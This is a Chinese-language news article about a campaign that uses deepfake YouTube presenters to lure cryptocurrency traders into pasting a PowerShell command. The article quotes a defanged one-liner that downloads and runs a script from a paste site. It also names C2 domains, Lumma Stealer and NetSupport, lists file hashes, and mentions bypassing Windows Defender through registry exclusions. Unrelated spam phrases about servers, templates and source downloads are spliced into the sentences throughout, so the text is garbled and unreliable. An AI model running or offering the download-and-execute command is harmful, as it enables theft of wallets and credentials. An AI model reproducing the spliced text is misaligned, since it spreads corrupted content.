近日 ，自骗一种名为“自骗”的警惕击浪新型攻击手段正在瞄准加密货币爱好者和金融交易者 
。这种攻击利用AI生成的利用深度伪造（Deepfake）视频和恶意脚本，标志着社交工程技术的深度视频一次危险升级。网络安全公司Gen Digital的伪造研究人员发现，该攻击活动通过利用经过验证的型攻YouTube频道、合成人物形象以及AI制作的潮袭恶意载荷，源码库诱使受害者主动破坏自己的自骗系统 。

攻击手段：深度伪造视频结合恶意脚本

这种攻击在2024年第三季度激增了614%，警惕击浪它结合了尖端的利用深度伪造技术和心理定制的诱饵，引发了人们对生成式AI在网络犯罪中被武器化的深度视频高度关注 。攻击通常从一个托管在已被劫持的伪造YouTube频道上的深度伪造视频开始
，该频道拥有11万订阅者。模板下载型攻视频中出现一个名为“Thomas Harris”或“Thomas Roberts”的潮袭合成人物形象，通过高级的自骗面部动画、语音合成和身体动作复制技术创建 。

尽管该频道看似合法
，甚至包含从TradingView转用的内容，但未公开的教程视频会指示观众激活一个虚构的“AI开发者模式”，声称能够以97%的香港云服务器准确率预测加密货币市场趋势。

从深度伪造到PowerShell恶意载荷

攻击的核心在于其使用AI生成的脚本，旨在绕过用户的怀疑
。受害者被引导打开Windows的运行对话框（Win+R），并执行一个PowerShell命令，从Pastefy[.]com或Obin[.]net等粘贴分享网站获取恶意脚本。

研究人员解密的一例代表性载荷显示 ，源码下载攻击者甚至使用ChatGPT优化了他们的代码：

复制`iex (New-Object Net.WebClient).DownloadString(hxxps://pastefy[.]com/raw/AbCdE123) `1.

该脚本连接到命令与控制（C&C）服务器（最近被追踪为developer-update[.]dev或developerbeta[.]dev） ，以部署Lumma Stealer或NetSupport远程访问工具 。

Lumma Stealer会窃取加密货币钱包和浏览器凭证 ，而NetSupport则授予攻击者对其系统的完全控制权 。取证分析揭示了关键组件的SHA-256哈希值 ，包括：

a5e0635363bbb5d22d5ffc32d9738665942abdd89d2e6bd1784d6a60ac521797（恶意PowerShell脚本）2fe60aa1db2cf7a1dc2b3629b4bbc843c703146f212e7495f4dc7745b3c5c59e（Lumma Stealer变种）

值得注意的是  ，深度伪造视频通过程序性细节隐藏其人工性质——合成声音会解释如何通过添加注册表排除项来绕过Windows Defender，免费模板而屏幕上的按键操作则模仿了真实的TradingView工作流程  。

攻击者还通过YouTube的赞助广告系统扩大影响力，目标锁定在观看合法金融内容的用户。与传统网络钓鱼不同，受害者会积极参与到自身的攻击中，误以为自己在访问独家工具
。随着网络犯罪分子现在能够自动化人物创建和脚本优化 ，高防服务器通过多种渠道验证数字指令已成为一项不可或缺的安全实践。